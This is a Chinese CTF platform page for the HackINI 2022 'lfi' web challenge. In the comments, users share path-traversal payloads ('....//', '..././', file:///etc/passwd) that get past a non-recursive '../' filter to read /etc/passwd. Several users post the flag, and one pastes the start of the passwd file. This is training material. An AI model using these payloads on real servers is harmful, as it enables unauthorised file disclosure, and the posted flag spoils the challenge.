lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 1432
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
hbesljx 1年前

直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../

回复 1

1005667204 1年前

使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd

回复 0

18993258097 1年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 0

菜鸡的小韩 1年前

这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可

回复 0

ABC第一深情 1年前

/?language=/etc/passwd

回复 3

曦羽unT0x1ns 1年前

直接用file:///etc/passwd居然也行 oAo

回复 0
13657809271 10月前

我这样怎么不行

回复 0

XHTX 1年前

?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子

回复 0

868954104 1年前

?language=/languages/....//....//....//....//etc/passwd

回复 0

868954104 1年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 1

yituoshi 1年前

Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol

回复 0

WriteUp

image
a2cai

2 金币

评分(1)

解题动态

15754287188 攻破了该题 5小时前
ivf321 攻破了该题 17小时前
luckylian 攻破了该题 19小时前
17335918325 攻破了该题 1天前
YCanhao 攻破了该题 1天前
小白ctf 攻破了该题 1天前
hsy2078844367 攻破了该题 1天前
2495280533 攻破了该题 1天前
2916213162 攻破了该题 2天前
swewjk 攻破了该题 2天前
buuble123 攻破了该题 2天前
人闲桂花落 攻破了该题 3天前
wsmemail 攻破了该题 3天前
18516952839 攻破了该题 4天前
渴死的鱼 攻破了该题 6天前
smallwhites 攻破了该题 7天前
1830955248 攻破了该题 8天前
ahsjezyt 攻破了该题 9天前
1345736679 攻破了该题 11天前
cw19950702 攻破了该题 11天前
问题反馈